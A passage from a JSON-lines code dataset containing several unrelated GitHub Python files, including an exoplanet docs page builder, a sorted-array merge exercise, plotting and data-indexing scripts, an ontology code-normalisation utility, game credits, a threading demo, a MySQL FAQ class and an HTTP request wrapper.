\n\n\"\"\"\n\nembed_image = \"\"\".. image:: {0}\n :width: 650\n :alt: {1}\"\"\"\n\nquery_aliases = False\n\n# Build individual webpages, one per target\n\npbar = tqdm(df_sinds.groupby('Target'))\n\nfor name, group in pbar:\n pbar.set_description(name)\n\n page[name] = group\n\n likely_planet_host = all([not name.startswith(key)\n for key in ['HD', 'GJ']])\n if likely_planet_host:\n if query_aliases:\n aliases = NasaExoplanetArchive.query_aliases(\n f\"{name.replace('.01', '')}\", cache=True\n )\n nea = NasaExoplanetArchive.query_object(\n f\"{name.replace('.01', '')} b\" if not name.strip().endswith('A')\n else f\"{name[:-1]} b\",\n table=\"pscomppars\", cache=True, regularize=False\n )\n if len(nea) > 0:\n nea_formatted = nea[params_to_write_out].to_pandas().transpose()\n nea_formatted.columns = [name]\n\n else:\n nea = []\n\n with open(f'docs/owls/targets/{name.replace(\" \", \"\")}.rst', 'w') as f:\n f.write(name.replace('.01', '') + '\\n' + len(name.replace('.01', '')) * '=' + '\\n\\n')\n f.write(\"`Search exo.mast `_\\n\\n\")\n f.write(\"`Search SIMBAD `_\\n\\n\")\n\n f.write(\".. raw:: html\\n\\n\")\n f.write(' ' + '\\n '.join(\n group[['Date', 'S', 'err']].to_html(index=False).splitlines()\n ) + '\\n\\n')\n\n if len(nea) > 0:\n nea_header = '`NASA Exoplanet Archive `_ parameters'\n f.write(nea_header + '\\n' + len(nea_header) * '-' + '\\n\\n')\n\n if query_aliases:\n f.write(\"Aliases: \" + ', '.join(aliases) + '\\n\\n')\n\n f.write(\".. raw:: html\\n\\n\")\n f.write(' ' + '\\n '.join(\n nea_formatted.to_html(index=True).splitlines()\n ) + '\\n\\n')\n\n f.write(\".. raw:: html\\n\\n\")\n f.write(' ' + '\\n '.join(\n aladin_lite.format(name.replace('.01', '')).splitlines()\n ) + '\\n\\n')\n\n png_path = f'figshare_pngs/{name.replace(\".01\", \"\").replace(\" \", \"\")}.png'\n\n if os.path.exists(png_path):\n fs_header = 'TESS Light Curve'\n f.write(fs_header + '\\n' + len(fs_header) * '-' + '\\n\\n')\n\n f.write(embed_image.format(png_path, name.replace('.01', '').replace(\" \", \"\")))\n\n if not name.replace(\" \", \"\") in targets_page:\n targets_page += f' targets/{name.replace(\" \", \"\")}.rst\\n'\n\n\n\n# Write out targets.rst page\nwith open(f'docs/owls/targets.rst', 'w') as f:\n f.write(targets_page)\n","repo_name":"bmorris3/owls","sub_path":"build_target_pages.py","file_name":"build_target_pages.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1320857556","text":"\"\"\"\nYou are given two integer arrays nums1 and nums2, sorted in non-decreasing order, and two integers m and n, \nrepresenting the number of elements in nums1 and nums2 respectively.\n\nMerge nums1 and nums2 into a single array sorted in non-decreasing order.\n\nThe final sorted array should not be returned by the function, but instead be stored inside the array nums1. \nTo accommodate this, nums1 has a length of m + n, where the first m elements denote the elements that should be merged, \nand the last n elements are set to 0 and should be ignored. 
nums2 has a length of n.\n\nExample 1:\n\nInput: nums1 = [1,2,3,0,0,0], m = 3, nums2 = [2,5,6], n = 3\nOutput: [1,2,2,3,5,6]\nExplanation: The arrays we are merging are [1,2,3] and [2,5,6].\nThe result of the merge is [1,2,2,3,5,6] with the underlined elements coming from nums1.\n\"\"\"\n\n# Time complexity: O(n*(n+m)) - each list.insert/pop shifts the elements behind it\n# Space complexity: O(1)\n\ndef merge(nums1, m, nums2, n):\n\t# Using 2 pointers for each array\n j = 0\n i = 0\n while i < m + j and j < n:\n if nums2[j] < nums1[i]:\n nums1.insert(i, nums2[j]) # bring a value from nums2\n nums1.pop(-1) # remove one zero\n j += 1\n i += 1\n\n while j < n: # if the second array still has some values then just add them to the first array\n nums1.insert(i, nums2[j])\n nums1.pop(-1)\n i += 1\n j += 1\n\n\nmerge([3,4,5,0,0], 3, [1,2], 2) # expected output: [1,2,3,4,5]\nmerge([1,2,3,0,0,0], 3, [2,5,6], 3) # expected output: [1,2,2,3,5,6]\nmerge([1], 1, [], 0) # expected output: [1]\nmerge([0], 0, [1], 1) # expected output: [1]\nmerge([-1,0,0,3,3,3,0,0,0], 6, [1,2,2], 3) # expected output: [-1,0,0,1,2,2,3,3,3]\n","repo_name":"YaraHorany/Programming-Challenges","sub_path":"MergeSortedArray.py","file_name":"MergeSortedArray.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37128095930","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport argparse as ap\nimport matplotlib.cm as cm\n\ncmap=cm.get_cmap('inferno')\n\nparser=ap.ArgumentParser()\nparser.add_argument('-nrep',type=int,default=0)\nparser.add_argument('-o',type=str,default='plot.png')\nparser.add_argument('-figsize',type=float,nargs=2,default=[9,6])\nargs=parser.parse_args()\n\nfig,ax=plt.subplots(1,1,figsize=args.figsize)\nfor i in range(args.nrep):\n with open('p{:d}.dat'.format(i)) as f:\n ln=f.readline()\n tok=ln.split()\n T=float(tok[3])\n xl,xr,h=np.loadtxt('p{:d}.dat'.format(i),unpack=True)\n ax.plot(0.5*(xl+xr),h,color=cmap(i/args.nrep),label='T = {:.3f}'.format(T))\nax.set_xlabel('$x$')\nax.set_ylabel('$H_i(x)$')\nax.legend()\nplt.savefig(args.o,bbox_inches='tight')\n\nt,x,a=np.loadtxt(\"rep0.log\",unpack=True,)\nfig,ax=plt.subplots(1,1,figsize=args.figsize)\nax.plot(t,x)\nplt.savefig('trace.png')","repo_name":"Abrams-Teaching/instructional-codes","sub_path":"originals/plot-re.py","file_name":"plot-re.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22444642256","text":"# Adapted 'produceOtherDataStructure.py' to save the image paths to a file.\n# The file is a set of subjects; each subject is a list of:\n# 1. subject name 'name' which is a string;\n# 2. list subject slices 'slices', which is a list of:\n# i. 'img1'\n# ii. 'img2'\n# iii. 'structure'\n# iv. 'lesion' if it is a patient\n# v. info if it is a patient 'is_patient' which is boolean\n# 3. 
subject info if it is a patient 'is_patient' which is boolean\n\nimport os # to read the folder structure\n# import shutil # to copy a file\n# import warnings # to throw a warning\nimport json # working with files\n\ndata_name = 'data_final'\nprint('saving the data paths to data_mialab/'+data_name+'.txt')\n\n# specify the path of your current data that you want to read\n############################################ change here\nreadPath = 'data_mialab/testOnsite_public'\n\nslices = []\n\n# loop over each file in path recursively\nfor r, d, f in os.walk(readPath): # r = root = current parent folder, d = current directorys (empty if there are no subdirectories in the current parent folder), f = current files (empty if there are no files in the current parent folder, e.g. if the parent folder is empty or if there are only subdirectories)\n\n structureArray = r.split(os.path.sep)\n\n # saving all image paths in their corresponding slices\n if 'img1.nii.gz' in f and 'img2.nii.gz' in f:\n sli = {'img1': os.path.join(r, \"img1.nii.gz\"),\n 'img2': os.path.join(r, \"img2.nii.gz\")}\n\n # saving the subject name\n for infoPart in structureArray:\n if 'subject' in infoPart:\n sli['subject'] = infoPart\n break\n\n # saving the slice name since some subjects have many slices with same slice name\n sli['slice'] = r\n\n slices.append(sli)\n\n else:\n for file in f:\n if '.nii.gz' in file:\n print('Found nii-file outside of slice: ', file)\n\n# saving the subject names\nsubjects = []\nsubject_names = set()\nfor sli in slices:\n subject_names.add(sli['subject'])\n\n# saving the subject name in subjects\nfor s in subject_names:\n subjects.append({'name': s, 'slices': []})\n\n# saving the slices in subjects\nfor sub in subjects:\n for sli in slices:\n if sli['subject'] == sub['name']:\n sub['slices'].append(sli)\n\n# save the slice paths in a file\njson.dump(slices, open('data_mialab/'+data_name+'.txt', 'w')) # subject-wise\n\nprint('done!')\n","repo_name":"madincode/MIAL","sub_path":"produceDataPathOnlineTest.py","file_name":"produceDataPathOnlineTest.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19641678221","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='arlulacore',\n version='2.0.3',\n author=\"Arlula\",\n author_email=\"tech@arlula.com\",\n description=\"A package to facilitate access to the Arlula Imagery Marketplace API\",\n\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Arlula/python-core-sdk.git\",\n packages=[\"arlulacore\"],\n install_requires=['requests'],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"markmnl/python-core-sdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"35390307518","text":"#!/usr/bin/env python\n# coding: utf-8\nimport numpy as np\n\n\n# UBKG utilities for parsing\n\n# codeReplacements - shared by at least the following scripts:\n# OWLNETS-UMLS-GRAPH\n# skowlnets\n\ndef codeReplacements(x, ingestSAB: str):\n # JAS 15 Nov 2022 - Refactor\n\n # This function converts strings that correspond to either codes or CUIs for concepts to a format\n # recognized by the 
knowledge graph.\n #\n # For most concepts this format is:\n # \n # There are a number of special cases, which are handled below.\n\n # The argument x is a Pandas Series object containing information on either:\n # a node (subject or object)\n # a dbxref\n\n # 1. Account for special cases of\n # a. MONDO\n # b. EDAM\n # c. JAS 13 JAN 2023 - UNIPROT\n # 2. Consolidate some string handling.\n # 3. Break up the original string replacement for ease of debugging.\n\n # Convert the code string to the CodeID format.\n # This is sufficient for all cases except EDAM, for which underscores will be restored.\n ret = x.str.replace(':', ' ').str.replace('#', ' ').str.split('/').str[-1]\n\n # Keep underscores for these SABs and their codes. -Ben\n # The \".str.replace('_', ' ')\" snippet was removed from the conversion above and is applied\n # here only when the ingested SAB is not in this list.\n if ingestSAB not in ['GTEX_COEXP','LINCS','MSIGDB','CMAP','CLINVAR','HUBMAPSC','SCHEART_PMID_31835037','HGNC_HPO',\n 'HPO_MP','HCOP','MP','HCOP_MP','HGNC_ANNOS','GTEX_EXP','GTEX_EQTL','KF']:\n ret = ret.str.replace('_', ' ')\n\n # Convert SABs to expected values.\n # NCI\n ret = ret.str.replace('NCIT ', 'NCI ', regex=False)\n\n # MSH\n ret = ret.str.replace('MESH ', 'MSH ', regex=False)\n # GO\n ret = ret.str.replace('GO ', 'GO GO:', regex=False)\n # NCBI\n ret = ret.str.replace('NCBITaxon ', 'NCBI ', regex=False)\n # UMLS\n ret = ret.str.replace('.*UMLS.*\\s', 'UMLS ', regex=True)\n # SNOMED\n ret = ret.str.replace('.*SNOMED.*\\s', 'SNOMEDCT_US ', regex=True)\n # HP\n ret = ret.str.replace('HP ', 'HPO HP:', regex=False)\n # FMA\n ret = ret.str.replace('^fma', 'FMA ', regex=True)\n # HGNC\n ret = ret.str.replace('Hugo.owl HGNC ', 'HGNC ', regex=False)\n ret = ret.str.replace('HGNC ', 'HGNC HGNC:', regex=False)\n ret = ret.str.replace('gene symbol report?hgnc id=', 'HGNC HGNC:', regex=False)\n\n # Special case:\n # MONDO identifies genes with IRIs in format\n # http://identifiers.org/hgnc/\n # Convert to HGNC HGNC:\n ret = np.where((ingestSAB == 'MONDO' and x.str.contains('http://identifiers.org/hgnc')),\n 'HGNC HGNC:' + x.str.split('/').str[-1], ret)\n\n # Special cases: EDAM codes.\n # 1. When obtained from edge file for source or object nodes, EDAM IRIs are in format\n # http://edamontology.org/_\n # e.g., http://edamontology.org/format_3750\n # 2. 
When obtained from node file for dbxref, EDAM codes are in the format\n # EDAM:_\n\n # Force the SAB to be EDAM and restore the underscore delimiter between domain and id.\n # ret = np.where((x.str.contains('http://edamontology.org')),\n # 'EDAM ' + x.str.replace(':', ' ').str.replace('#', ' ').str.split('/').str[-1]\n # , ret)\n\n # Case 2\n ret = np.where((x.str.contains('EDAM')), x.str.split(':').str[-1], ret)\n # Case 1\n ret = np.where((x.str.contains('edam')), 'EDAM ' + x.str.replace(' ', '_').str.split('/').str[-1], ret)\n\n # JAS JAN 2023 - Special case: Glyco Glycan\n # Glycan node IRIs are in format:\n # http://purl.jp/bio/12/glyco/glycan#(code delimited with underscore)\n # Force the SAB to be GLYCO.GLYCAN and restore the underscore delimiter between domain and id.\n ret = np.where((x.str.contains('http://purl.jp/bio/12/glyco/glycan')),\n 'GLYCO.GLYCAN ' + x.str.replace(' ', '_').str.replace('#', '/').str.split('/').str[-1], ret)\n\n # JAS JAN 2023 - Special case: Glyco Conjugate\n # Glycan node IRIs are in format:\n # http://purl.jp/bio/12/glyco/conjugate#(code delimited with underscore)\n # Force the SAB to be GLYCO.CONJUGATE and restore the underscore delimiter between domain and id.\n ret = np.where((x.str.contains('http://purl.jp/bio/12/glyco/conjugate')),\n 'GLYCO.CONJUGATE ' + x.str.replace(' ', '_').str.replace('#', '/').str.split('/').str[-1], ret)\n\n # JAS JAN 2023 - Special case: NCBI's GENE database\n # Node IRIs for genes in NCBI GENE are in format\n # http: // www.ncbi.nlm.nih.gov / gene / 19091\n # FEB 2023\n # NCBI Gene IDs are currently stored in the NCI SAB obtained from UMLS, with code IDs that\n # prepend a 'C' to the Gene ID.\n # Until we ingest NCBI Gene directly, map to NCI format.\n ret = np.where(x.str.contains('http://www.ncbi.nlm.nih.gov/gene'), 'NCI' + 'C' + x.str.split('/').str[-1], ret)\n\n # JAS JAN 2023 - Special case: NIFSTD\n # As with EDAM, Node IRIs for codes from NIFSTD show domains--e.g.,\n # http://uri.neuinfo.org/nif/nifstd/nlx_149264, where \"nlx\" is the domain\n # Unify codes under the SAB NIFSTD and restore the underscore delimiter between domain and id.\n ret = np.where(x.str.contains('http://uri.neuinfo.org/nif/nifstd'),\n 'NIFSTD' + x.str.replace(' ', '_').str.split('/').str[-1], ret)\n\n # Special case:\n # HGNC codes in expected format--i.e., that did not need to be converted above.\n # This is currently the case for UNIPROTKB.\n ret = np.where(x.str.contains('HGNC HGNC:'), x, ret)\n\n # JAS 13 JAN 2023 - Special case: UNIPROT (not to be confused with UNIPROTKB).\n # The Uniprot OWL node IRIs do not conform to OBO, so set SAB explicitly.\n ret = np.where(x.str.contains('http://purl.uniprot.org'), 'UNIPROT ' + x.str.split('/').str[-1], ret)\n\n # JAS JAN 2023 - Special case: HRAVS\n ret = np.where(x.str.contains('http://purl.humanatlas.io/valueset/'), 'HRAVS ' + x.str.split('/').str[-1], ret)\n ret = np.where(x.str.contains('Thesaurus.owl'), 'NCI ' + x.str.split('#').str[-1], ret)\n\n # JAS 12 JAN 2023 - Force SAB to uppercase.\n # The CodeId will be in format SAB , and can be mixed case.\n # can also have spaces.\n # ret is now a numpy array.\n # Split each element; convert the SAB portion to uppercase; and rejoin.\n for idx, x in np.ndenumerate(ret):\n x2 = x.split(sep=' ', maxsplit=1)\n x2[0] = x2[0].upper()\n ret[idx] = ' '.join(x2)\n return ret\n\n # original code\n # return x.str.replace('NCIT ', 'NCI ', regex=False).str.replace('MESH ', 'MSH ', regex=False) \\\n # .str.replace('GO ', 'GO GO:', regex=False) \\\n # 
.str.replace('NCBITaxon ', 'NCBI ', regex=False) \\\n # .str.replace('.*UMLS.*\\s', 'UMLS ', regex=True) \\\n # .str.replace('.*SNOMED.*\\s', 'SNOMEDCT_US ', regex=True) \\\n # .str.replace('HP ', 'HPO HP:', regex=False) \\\n # .str.replace('^fma', 'FMA ', regex=True) \\\n # .str.replace('Hugo.owl HGNC ', 'HGNC ', regex=False) \\\n # .str.replace('HGNC ', 'HGNC HGNC:', regex=False) \\\n # .str.replace('gene symbol report?hgnc id=', 'HGNC HGNC:', regex=False)\n","repo_name":"TaylorResearchLab/CFDE_DataDistillery","sub_path":"scripts/ubkg_utilities/parsetools.py","file_name":"parsetools.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73230511731","text":"\"\"\"This is the file that contains all the credits.\"\"\"\r\nimport copy\r\n\r\ncredit_order = [\r\n True, False, False, False, False, False, False, False, False,\r\n False, False, False, False, False, False, False, False, False, False,\r\n False, False, False, False, False, False, False, False, False, False,\r\n ]\r\n\r\ncredit_order_copy = [\r\n True, False, False, False, False, False, False, False, False,\r\n False, False, False, False, False, False, False, False, False, False,\r\n False, False, False, False, False, False, False, False, False, False,\r\n ]\r\n\r\nmessage = [\"\", \"Speed up the credits\", \"by pressing space\", \"\", \"Slow them down\", \"by pressing backspace\"]\r\nmessage_coor = [650, 700, 740, 780, 820, 860] # Coordinate on y-axis\r\nmessage_x = [300, 300, 300, 300, 300, 300] # Coordinate on x-axis\r\n\r\ndirectors = [\"Game directors\", \"Siem Jongsma\", \"Chen Ji Rong 'Jack' Jiang\", \"Nikki Rademaker\", \"Amarise Silié\", \"Yanna Smid\"]\r\nd_coordinates = [650, 700, 740, 780, 820, 860]\r\nd_x = [300, 300, 300, 300, 300, 300]\r\n\r\nsupervisors = [\"Supervisors\", \"Giulio Barbero\", \"Fenia Aivaloglou\", \" \", \" \", \" \"]\r\ns_coordinates = [650, 700, 750, 800, 800, 900]\r\ns_x = [300, 300, 300, 300, 300, 300]\r\n\r\ndesigners = [\"Game designers\", \"Siem Jongsma\", \"Chen Ji Rong 'Jack' Jiang\", \"Nikki Rademaker\", \"Amarise Silié\", \"Yanna Smid\"]\r\ndes_coordinates = [650, 700, 750, 800, 850, 900]\r\ndes_x = [270, 270, 270, 270, 270, 270]\r\n\r\nmusic = [\"Background music\", \"Main screens: cute\", \"Field: smile\", \"Beach: ukelele\", \"Sea: psychedelic\", \"\"]\r\nmusic_coor = [650, 750, 850, 950, 1050, 1040]\r\nmusic_x = [300, 300, 300, 300, 300, 300]\r\n\r\nmusic_2 = [\"\", \"Snow: littleidea\", \"Space: enigmatic\", \"Credit: adventure\", \"from Bensound.com\", \"\"]\r\nmusic_coor_2 = [620, 750, 850, 950, 1050, 1060]\r\nmusic_x_2 = [300, 300, 300, 300, 300, 300]\r\n\r\nmusic_program = [\"Music programming\", \"Nikki Rademaker\", \"\", \"\", \"\", \"\"]\r\nm_pr_coor = [650, 700, 730, 730, 730, 750]\r\nm_pr_x = [250, 290, 300, 300, 300, 300]\r\n\r\nbg_program = [\"Background programming\", \"Chen Ji Rong 'Jack' Jiang\", \"Yanna Smid\", \"Nikki Rademaker\", \"\", \"\"]\r\nbg_pr_coordinates = [650, 700, 740, 800, 850, 900]\r\nbg_pr_x = [200, 300, 300, 300, 300, 300]\r\n\r\ntext_program = [\"Text programming\", \"Amarise Silié\", \"Siem Jongsma\", \"Yanna Smid\", \"Chen Ji Rong 'Jack' Jiang\", \"Nikki Rademaker\"]\r\ntext_coor = [650, 700, 750, 800, 850, 900]\r\ntext_x = [245, 300, 300, 300, 300, 300]\r\n\r\nlevel_program = [\"Level programming\", \"Amarise Silié\", \"Yanna Smid\", \"Siem Jongsma\", \"Chen Ji Rong 'Jack' Jiang\", \"\"]\r\nl_pr_coor = [650, 700, 750, 800, 850, 900]\r\nl_pr_x_ = 
[235, 300, 300, 300, 300, 300]\r\n\r\nmulti_program = [\"Multiplayer programming\", \"Yanna Smid\", \"Nikki Rademaker\", \"Chen Ji Rong 'Jack' Jiang\", \"\", \"\", \"\"]\r\nmulti_coor = [650, 700, 750, 800, 850, 900]\r\nmulti_x = [210, 300, 300, 300, 300, 300]\r\n\r\ntimer_program = [\"Time Attack programming\", \"Siem Jongsma\", \"Amarise Silié\", \"\", \"\", \"\"]\r\ntime_coor= [650, 700, 750, 800, 850, 900]\r\ntime_x = [210, 300, 300, 300, 300, 300]\r\n\r\nbutton_program = [\"Button programming\", \"Nikki Rademaker\", \"\", \"\", \"\", \"\"]\r\nb_pr_coor = [650, 700, 750, 800, 850, 900]\r\nb_pr_x = [235, 300, 300, 300, 300, 300]\r\n\r\ncredit_program = [\"Credit programming\", \"Yanna Smid\", \"Amarise Silié\", \"\", \"\", \"\"]\r\ncred_coor = [650, 700, 750, 800, 850, 900]\r\ncred_x = [240, 300, 300, 300, 300, 300]\r\n\r\nbg_design = [\"Background designs\", \"Yanna Smid\", \"Nikki Rademaker\", \" \", \" \", \" \"]\r\nbg_coordinates = [650, 700, 750, 800, 850, 900]\r\nbg_x = [220, 300, 300, 300, 300, 300]\r\n\r\nbutton_design = [\"Button designs\", \"Nikki Rademaker\", \"Yanna Smid\", \" \", \" \", \" \"]\r\nb_coordinates = [650, 700, 750, 800, 850, 900]\r\nb_x = [280, 300, 300, 300, 300, 300]\r\n\r\nchar_design = [\"Character designs\", \"Yanna Smid\", \"Nikki Rademaker\", \"\", \"\", \"\"]\r\nchar_coor = [650, 700, 750, 800, 850, 900]\r\nchar_x = [270, 300, 300, 300, 300, 300]\r\n\r\nchar_actors = [\"Actors\", \"LEAD: Bee\", \"Monkey\", \"Penguin\", \"Nikkelien the Alien\", \"\"]\r\nactors_coor = [650, 700, 750, 800, 850, 910]\r\nactors_x = [300, 300, 300, 300, 300, 300]\r\n\r\nproducers = [\"Produced by\", \"Siem Jongsma\", \"Chen Ji Rong 'Jack' Jiang\", \"Nikki Rademaker\", \"Amarise Silié\", \"Yanna Smid\"]\r\nprod_coor = [650, 700, 750, 800, 850, 900]\r\nprod_x = [300, 300, 300, 300, 300, 300]\r\n\r\ndevelopers = [\"Developed by\", \"Siem Jongsma\", \"Chen Ji Rong 'Jack' Jiang\", \"Nikki Rademaker\", \"Amarise Silié\", \"Yanna Smid\"]\r\ndev_coor = [650, 700, 750, 800, 850, 900]\r\ndev_x = [300, 300, 300, 300, 300, 300]\r\n\r\nlast_creds = [\"Leiden University\", \"Faculty of Science\", \"Bioinformatics\", \"\", \"\", \"\"]\r\nlast_coor = [650, 700, 750, 800, 850, 900]\r\nlast_x = [270, 270, 270, 300, 300, 300]\r\n\r\nspecial_thanks = [\"Special thanks to\", \"Ourselves\", \"\", \"Friends and family\", \"who tested our program\", \"\"]\r\nspecial_coor = [650, 700, 750, 800, 850, 900]\r\nspecial_x = [230, 230, 230, 230, 230, 300]\r\n\r\nthanks = [\"Thanks for playing!\", \"\", \"Stay for the trivia!\", \"\", \"\", \"\"]\r\nthanks_coor = [650, 700, 750, 800, 850, 900]\r\nthanks_x = [230, 300, 260, 300, 300, 300]\r\n\r\ntrivia_1 = [\"Sea\", \"is the world that took\", \"the longest to draw\", \"\", \"\", \"\"]\r\ntrivia_1_coor = [650, 700, 750, 800, 850, 900]\r\ntrivia_1_x = [300, 300, 300, 300, 300, 300]\r\n\r\ntrivia_2 = [\"Level 25\", \"is the hardest to\", \"complete for the\", \"game makers\", \"\", \"\"]\r\ntrivia_2_coor = [650, 700, 750, 800, 850, 900]\r\ntrivia_2_x = [300, 300, 300, 300, 300, 300]\r\n\r\ntrivia_3 = [\"Timer high scores\", \"from the game makers\", \"easy: 48 by Amarise\", \"medium: 43 by Amarise\", \"hard: 35 by Yanna\", \"\"]\r\ntrivia_3_coor = [650, 700, 750, 800, 850, 900]\r\ntrivia_3_x = [240, 300, 300, 300, 300, 300]\r\n\r\ntrivia_4 = [\"Favorite worlds\", \"Siem: Beach\", \"Jack: Space\", \"Nikki: Beach\", \"Amarise: Sea\", \"Yanna: Snow\"]\r\ntrivia_4_coor = [650, 700, 750, 800, 850, 900]\r\ntrivia_4_x = [300, 300, 300, 300, 300, 
300]\r\n\r\nall_credits = [\r\n message, directors, supervisors, designers, music, music_2, music_program, bg_program,\r\n text_program, level_program, multi_program, timer_program, button_program, credit_program,\r\n bg_design, button_design, char_design, char_actors, producers, developers, last_creds,\r\n special_thanks, thanks, trivia_1, trivia_2, trivia_3, trivia_4,\r\n ]\r\n\r\nall_coordinates = [\r\n message_coor, d_coordinates, s_coordinates, des_coordinates, music_coor, music_coor_2,\r\n m_pr_coor, bg_pr_coordinates, text_coor, l_pr_coor, multi_coor, time_coor, b_pr_coor,\r\n cred_coor, bg_coordinates, b_coordinates, char_coor, actors_coor, prod_coor, dev_coor,\r\n last_coor, special_coor, thanks_coor, trivia_1_coor, trivia_2_coor, trivia_3_coor,\r\n trivia_4_coor,\r\n ]\r\nall_coordinates_copy = copy.deepcopy(all_coordinates)\r\n\r\nall_x_coordinates = [\r\n message_x, d_x, s_x, des_x, music_x, music_x_2, m_pr_x, bg_pr_x, text_x, l_pr_x_,\r\n multi_x, time_x, b_pr_x, cred_x, bg_x, b_x, char_x, actors_x, prod_x, dev_x, last_x,\r\n special_x, thanks_x, trivia_1_x, trivia_2_x, trivia_3_x, trivia_4_x,\r\n ]\r\n","repo_name":"chenjirongjiang/Arithmekids","sub_path":"credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":6905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38257661818","text":"#!/usr/bin/env python\n\n# C.py\n\n\nfrom __future__ import print_function\nimport sys\n\nDEBUG = True\n\ndef log(*args, **kwargs):\n if not DEBUG:\n return\n kwargs[\"file\"] = sys.stderr\n print(*args, **kwargs)\n\n\n\n\ndef solver(N, M):\n def OutOfLine(X):\n # integer division: customers started on by time X, summed over all barbers\n return sum((X-1)//speed + 1 for speed in M)\n\n def WhichBarber(X, num):\n for i, barb in enumerate(M):\n if X % barb != 0:\n continue\n if num > 1:\n num -= 1\n else:\n return i+1\n return -1 # unreachable for valid input\n\n def AvailableBarbers(X):\n return [i+1 if X % m == 0 else \"x\" for i, m in enumerate(M)]\n\n low = 0\n high = (N + 1) * 100000\n while (abs(high - low) > 1):\n X = low + (high - low)//2\n val = OutOfLine(X)\n if val >= N:\n high = X\n if val < N:\n low = X\n\n log(\"~~~~~~~~~~~~~~~~~\")\n log(\"range is: (%s,%s) with bounds for %s in [%s, %s]\" % (low, high, N, OutOfLine(low), OutOfLine(high)))\n threshold_val = OutOfLine(low)\n res = N - threshold_val\n log(\"now low is even: D(%s)=%s, R(low)=%s\" % (low, threshold_val, res))\n log(\"M=\",M)\n log(\"M=\",AvailableBarbers(low))\n log(\"~~~~~~~~~~~~~~~~~\")\n return WhichBarber(low, res)\n\n\nnum_tests = int(input())\nfor i in range(1,num_tests+1):\n N = int(input().split(\" \")[1])\n M = [int(sym) for sym in input().split(\" \")]\n print(\"Case #%s: %s\" % (i, solver(N, M)))\n","repo_name":"dborzov/codejam","sub_path":"2015-round1/Problem.A/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23646558801","text":"# join\n# The main thread does not wait for its child threads and would finish first; join() makes it wait for them\nimport threading\nfrom threading import Thread\nfrom time import sleep, time\nimport os\n\n\nclass threadFunction(Thread):\n def __init__(self, name):\n super(threadFunction, self).__init__()\n self.name = name\n\n def run(self):\n sleep(2)\n print('hello how are you {}\\t'.format(self.name), os.getpid())\n\n\nif __name__ == \"__main__\":\n\n print(threading.currentThread())\n\n t = threadFunction('lucy')\n t1 = threadFunction('value')\n\n # Start timing\n date_start = time()\n t.start()\n t1.start()\n\n t.join() # the child threads print before the main thread continues\n t1.join()\n\n # 
End timing\n date_end = time() - date_start\n print('Elapsed time: {}'.format(date_end))\n\n print('Main thread: {}'.format(os.getpid()))\n","repo_name":"xiaotiankeyi/PythonBase","sub_path":"python_processThreading/threading/threading_join.py","file_name":"threading_join.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12244256807","text":"import pymysql\n\nclass Faq():\n def __init__(self, db: pymysql.connect) -> None:\n self.db = db\n\n def insert(self, question: str, answer: str) -> bool:\n prepare = \"INSERT INTO `faq` (`question`, `answer`) VALUES (%s, %s)\"\n try:\n with self.db.cursor() as cursor:\n cursor.execute(prepare, (question, answer))\n self.db.commit()\n except Exception:\n return False\n return True\n\n def remove(self, id: int) -> bool:\n prepare = \"DELETE FROM `faq` WHERE `id` = %s\"\n try:\n with self.db.cursor() as cursor:\n cursor.execute(prepare, (id,)) # (id,) is a one-element tuple; (id) would pass a bare int\n self.db.commit()\n except Exception:\n return False\n return True\n\n def fetchall(self) -> list:\n prepare = \"SELECT `id`, `question`, `answer` FROM `faq`\"\n try:\n with self.db.cursor() as cursor:\n cursor.execute(prepare)\n result = cursor.fetchall()\n except Exception:\n return None\n return result\n\n def close(self):\n self.db.close()\n","repo_name":"Block2School/back","sub_path":"src/database/Faq.py","file_name":"Faq.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8047205761","text":"import utils.logs as logs\nimport os\ntry:\n import requests\n requests.packages.urllib3.disable_warnings()\nexcept ImportError:\n print(\"[-]Failed to import requests module\")\n\ndef update_header_w_auth(headers):\n new_auth = os.environ['auth_header']\n headers.update({'Authorization': new_auth})\n return headers # return the dict so the caller's rebinding keeps the headers\n\ndef api_request(url,method,headers,body=None):\n try:\n headers = update_header_w_auth(headers)\n except KeyError:\n #print(\"Authorization header not specified\")\n pass\n try: \n if method.upper() == \"GET\":\n auth_request = requests.get(url,headers=headers, allow_redirects=False,verify=False, timeout=10)\n elif method.upper() == \"POST\":\n auth_request = requests.post(url,headers=headers,data=body, allow_redirects=False,verify=False, timeout=10)\n elif method.upper() == \"PUT\":\n auth_request = requests.put(url,headers=headers,data=body, allow_redirects=False,verify=False, timeout=10)\n elif method.upper() == \"OPTIONS\":\n auth_request = requests.options(url,headers=headers, verify=False,timeout=10)\n return auth_request\n\n except Exception as e:\n logs.logging.error(\"Exception from sendrequest 